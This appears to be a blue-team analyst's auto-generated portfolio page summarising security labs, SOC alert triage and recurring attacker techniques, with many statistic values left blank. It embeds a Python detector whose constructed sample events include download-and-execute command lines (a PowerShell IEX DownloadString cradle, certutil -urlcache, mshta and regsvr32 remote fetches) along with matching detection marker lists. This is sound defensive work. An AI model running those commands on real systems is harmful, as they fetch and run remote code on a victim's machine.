// portfolio metrics

Lab Portfolio Stats

Wiki generated  ·  pages  ·  auto-generated from Obsidian vault
// About this page
This is an auto-generated snapshot from my Obsidian vault. It surfaces patterns across labs, SOC alerts, and a -page wiki covering malware families, threat actors, and MITRE techniques. Every number links back to a documented investigation. Full writeups at /blue-team/labs.
Platform & Difficulty
Platform Split
Difficulty Breakdown
Categories & Tools
Top Categories
Most Used Tools
MITRE ATT&CK Coverage
Tactics by Wiki Source Count
Malware Families Investigated
Confirmed Families
Notable Specialty Labs
APT / Nation-State
Gothic Panda series · andromeda-bot-unc4210 · revil_gold
Cloud Forensics
awsraid · azurehunt · rogueazure · spilledbucket
Supply Chain
3cxsupplychain · npm_supply_chain_attack
Memory Forensics
amadey · latent · firstweek · volatilitytraces
Ransomware IR
raasunfold · revil_gold · maranhao · ramnit
Unique Scenarios
containerbreak (escape) · androidbreach (mobile)
LetsDefend — SOC Alert Triage
Alert Categories
Severity Split
Outcome
FP causes: WinRAR/Google Update downloads, authorised pentest activity, legitimate domains flagged by keyword match
CVEs Investigated
Threat Actors Tracked
Recurring Attacker TTP Patterns
01 · Phishing → macro/exploit → PowerShell → payload download (~12 cases — Emotet, Maze, AsyncRAT, LummaStealer)
02 · CVE exploitation → web shell → privilege escalation (SharePoint ×2, Confluence, Splunk, PAN-OS)
03 · LOLBin proxy execution to bypass controls (mshta, certutil, rundll32, wscript, regsvr32)
04 · Brute force exposed service → valid account → RDP/VPN lateral access
05 · Post-compromise discovery and privilege escalation, mixing LOLBins with dropped tooling (wmiexec, JuicyPotato, LinEnum, certutil, BloodHound)
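An added detection sketch for patterns 01 and 03 above, written for this page rather than taken from any of the labs or the vault. It runs over constructed Sysmon-style process-creation events; every pid, path and hostname is made up (example.invalid is a reserved name), and the marker lists are my assumptions about what separates abuse of each binary from routine use, not a vetted ruleset.

```python
"""Added example: a small detector for two of the recurring TTP patterns
listed above, run over constructed process-creation events.

  01  Office app -> PowerShell -> payload download
  03  LOLBin proxy execution (mshta, certutil, rundll32, wscript, regsvr32)

Events use Sysmon Event ID 1 style fields (pid, ppid, image, cmdline). All
events, paths and hostnames are constructed for the example; the marker
lists are assumptions about what separates abuse from routine use.
"""
from dataclasses import dataclass

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
LOLBINS = {"mshta.exe", "certutil.exe", "rundll32.exe", "wscript.exe", "regsvr32.exe"}

# Command-line fragments showing PowerShell is fetching a payload.
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest",
                    "start-bitstransfer", "http://", "https://")

# Per-binary fragments that point to proxy execution rather than normal use.
# Matching is done on the lower-cased command line.
LOLBIN_ABUSE = {
    "certutil.exe": ("-urlcache", "-decode", "-encode"),
    "mshta.exe": ("http://", "https://", "javascript:", "vbscript:"),
    "regsvr32.exe": ("/i:http", "/i:https", "scrobj.dll"),
    "rundll32.exe": ("javascript:", "http://", "https://"),
    "wscript.exe": ("\\downloads\\", "\\temp\\"),
}


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path as logged
    cmdline: str


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(events):
    """Return one finding dict per suspicious event, in event order.

    Parent lookup is by PPID within the supplied batch, which assumes no PID
    reuse inside the window; a real pipeline should key on ParentProcessGuid.
    """
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        img = basename(e.image)
        cl = e.cmdline.lower()
        parent = by_pid.get(e.ppid)
        parent_img = basename(parent.image) if parent else ""

        # Pattern 01: a document viewer should never be spawning a shell.
        if img in SHELLS and parent_img in OFFICE_APPS:
            downloading = any(m in cl for m in DOWNLOAD_MARKERS)
            findings.append({
                "pid": e.pid,
                "pattern": "01",
                "severity": "high" if downloading else "medium",
                "reason": f"{parent_img} spawned {img}"
                          + (" with download command line" if downloading else ""),
            })

        # Pattern 03: a signed Windows binary used to fetch or run remote code.
        if img in LOLBINS and any(m in cl for m in LOLBIN_ABUSE[img]):
            findings.append({
                "pid": e.pid,
                "pattern": "03",
                "severity": "high",
                "reason": f"{img} proxy execution: {e.cmdline}",
            })
    return findings


# Constructed events. example.invalid is a reserved name, not a real host.
SAMPLE_EVENTS = [
    ProcEvent(100, 1,   r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r'"WINWORD.EXE" /n "C:\Users\alice\Downloads\invoice.docm"'),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://example.invalid/a.ps1')\""),
    ProcEvent(400, 100, r"C:\Windows\System32\certutil.exe",
              "certutil.exe -urlcache -split -f http://example.invalid/x.txt x.txt"),
    # Routine rundll32 use (opens Internet Options): should not fire.
    ProcEvent(500, 100, r"C:\Windows\System32\rundll32.exe",
              "rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl"),
    ProcEvent(600, 100, r"C:\Windows\System32\mshta.exe",
              "mshta.exe http://example.invalid/p.hta"),
    # Interactive PowerShell from Explorer, no Office parent: should not fire.
    ProcEvent(700, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -Command Get-Date"),
    ProcEvent(800, 100, r"C:\Windows\System32\regsvr32.exe",
              "regsvr32.exe /s /n /u /i:http://example.invalid/a.sct scrobj.dll"),
    ProcEvent(900, 100, r"C:\Windows\System32\wscript.exe",
              r"wscript.exe C:\Users\alice\Downloads\invoice.vbs"),
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f['severity']}] pattern {f['pattern']} pid={f['pid']}: {f['reason']}")
```

The two benign events (routine rundll32 use and an interactive PowerShell whose parent is Explorer) are there deliberately: the parent-process check is what keeps pattern 01 from firing on every shell, and the per-binary marker lists are what keep pattern 03 from flagging the hundreds of legitimate rundll32 and wscript launches a workstation produces daily. The same shape extends to pattern 05 by adding the dropped tooling names to the image allowlist.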
Top MITRE Techniques — by Wiki Source Count
Full coverage mapped on the ATT&CK Heatmap →
Active growth area: Cloud forensics currently represents of labs. AWS CloudTrail/S3, Azure Sentinel, and Microsoft Defender for Cloud investigations are in active rotation — this number is moving.